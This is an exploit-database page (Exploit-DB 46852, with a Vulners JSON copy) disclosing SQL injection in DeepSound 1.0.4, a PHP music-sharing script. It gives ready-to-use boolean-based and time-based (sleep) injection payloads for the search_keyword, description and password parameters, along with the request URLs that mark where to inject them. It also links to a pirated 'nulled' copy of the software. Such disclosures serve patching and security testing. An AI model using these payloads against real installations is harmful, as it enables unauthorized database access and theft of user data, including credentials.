Search...

DeepSound 1.0.4 - SQL Injection

2019-05-16T00:00:00

ID EDB-ID:46852
Type exploitdb
Reporter Exploit-DB
Modified 2019-05-16T00:00:00

Description

                                        
                                            ===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : search_keyword
# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
# POST Method :
http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : description
# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)&gt;1,sleep(3),0)
--%20
# POST Method : http://localhost/Script/admin?id=&description=[TEXT
INPUT]2350265[SQL Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: DeepSound 1.0.4 - SQL Inj.
# Dork: N/A
# Date: 15-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
# Software Link:
https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
# Version: v1.0.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: DeepSound is a music sharing script, DeepSound is
the best way to start your own music website!
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
# POST Method :
http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
Inject Here]
===========================================================================================
###########################################################################################

JSON Vulners Source

Initial Source

{"id": "EDB-ID:46852", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DeepSound 1.0.4 - SQL Injection", "description": "", "published": "2019-05-16T00:00:00", "modified": "2019-05-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46852", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-05-16T12:19:29", "viewCount": 126, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-05-16T12:19:29", "rev": 2}, "dependencies": {"references": [], "modified": "2019-05-16T12:19:29", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://www.exploit-db.com/download/46852", "sourceData": "===========================================================================================\r\n# Exploit Title: DeepSound 1.0.4 - SQL Inj.\r\n# Dork: N/A\r\n# Date: 15-05-2019\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage:\r\nhttps://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470\r\n# Software Link:\r\nhttps://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/\r\n# Version: v1.0.4\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: DeepSound is a music sharing script, DeepSound is\r\nthe best way to start your own music website!\r\n===========================================================================================\r\n# POC - SQLi\r\n# Parameters : search_keyword\r\n# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199\r\n# POST Method :\r\nhttp://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL\r\nInject Here]\r\n===========================================================================================\r\n###########################################################################################\r\n===========================================================================================\r\n# Exploit Title: DeepSound 1.0.4 - SQL Inj.\r\n# Dork: N/A\r\n# Date: 15-05-2019\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage:\r\nhttps://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470\r\n# Software Link:\r\nhttps://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/\r\n# Version: v1.0.4\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: DeepSound is a music sharing script, DeepSound is\r\nthe best way to start your own music website!\r\n===========================================================================================\r\n# POC - SQLi\r\n# Parameters : description\r\n# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0)\r\n--%20\r\n# POST Method : http://localhost/Script/admin?id=&description=[TEXT\r\nINPUT]2350265[SQL Inject Here]\r\n===========================================================================================\r\n###########################################################################################\r\n===========================================================================================\r\n# Exploit Title: DeepSound 1.0.4 - SQL Inj.\r\n# Dork: N/A\r\n# Date: 15-05-2019\r\n# Exploit Author: Mehmet EMIROGLU\r\n# Vendor Homepage:\r\nhttps://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470\r\n# Software Link:\r\nhttps://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/\r\n# Version: v1.0.4\r\n# Category: Webapps\r\n# Tested on: Wamp64, Windows\r\n# CVE: N/A\r\n# Software Description: DeepSound is a music sharing script, DeepSound is\r\nthe best way to start your own music website!\r\n===========================================================================================\r\n# POC - SQLi\r\n# Parameters : password\r\n# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199\r\n# POST Method :\r\nhttp://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL\r\nInject Here]\r\n===========================================================================================\r\n###########################################################################################", "osvdbidlist": []}